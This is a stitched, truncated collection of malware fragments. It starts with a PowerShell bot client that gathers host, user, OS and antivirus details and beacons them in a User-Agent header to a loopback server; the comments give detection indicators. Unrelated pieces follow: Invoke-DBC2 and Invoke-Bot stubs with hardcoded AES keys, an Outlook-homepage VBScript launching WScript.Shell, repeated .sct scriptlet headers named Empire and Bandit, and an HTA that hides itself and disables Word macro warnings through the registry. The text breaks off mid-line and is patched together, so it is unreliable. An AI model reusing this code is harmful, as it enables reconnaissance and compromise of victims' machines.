
# Truncated preview of a PowerShell HTTP client; the listing stops inside post() at "GetBytes([",
# so what goes into the request body and what happens to the response are not visible here.
#
# Globals: $spl ('BC_SPL') is the field delimiter, $vn ('BC_Vic') is a fixed prefix,
# $wTime (1500) is the value passed to Start-Sleep -m when info fails.
#
# info: builds one delimiter-separated string from the machine name, the user name, the first
# VolumeSerialNumber returned by Win32_LogicalDisk, an abbreviated OS caption with service pack and
# architecture, the literal 'PS1 0.1', and the displayName of AntiVirusProduct in
# root/SecurityCenter2. Any exception is swallowed: the catch only sleeps and nothing is returned.
#
# post: creates an HttpWebRequest to 'http://127.0.0.1:1993/' + $cmdv, sets the method to POST and
# assigns the output of info to the User-Agent header, so the host inventory travels in a request
# header rather than in the body.
#
# NOTE(review): for detection, the visible traits are a User-Agent value containing the literal
# 'BC_SPL' delimiter and host details, plain-HTTP POSTs issued from a PowerShell host, and WMI
# queries for AntiVirusProduct in root/SecurityCenter2. The loopback address and port shown here
# look like a placeholder; confirm against the full script before using them as indicators.
$spl = 'BC_SPL';$vn = 'BC_Vic';$wTime = 1500;[System.Net.HttpWebRequest]$Req;function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi.replace('Microsoft Windows','Win') + ' SP' + (Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$u = $vn + '_' + $HWD + $spl + $mch + ' \ ' + $usr + $spl + $wi + $spl + $spl + 'PS1 0.1' + $spl + $av + $spl;return $u} catch {Start-Sleep -m $wTime}};function post ($cmdv, $v) { try { $Req = [System.Net.HttpWebRequest]::Create('http://127.0.0.1:1993/' + $cmdv);$Req.Method = 'POST';$Req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req.GetRequestStream();$buffer = [System.Text.Encoding]::UTF8.GetBytes([
Function Invoke-DBC2{
Function Invoke-Bot{
$Global:secretIV = "Key@123Key@123fd"
$Global:SecretKey = "secret#456!23key"
Function Aes-Decrypt($DecryptData){
#Use the AES cipher and represent it as an object.
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
Elm0D / nj6.sct
Created September 28, 2017 14:53
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
<html>
<body>
<script type="text/vbscript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
<?XML version="1.0"?>
<scriptlet>
<registration
description="FofX"
progid="FofX"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
<?XML version="1.0"?>
<scriptlet>
<registration
description="FofX"
progid="FofX"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
<?XML version="1.0"?>
<scriptlet>
<registration
description="WzVQ"
progid="WzVQ"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">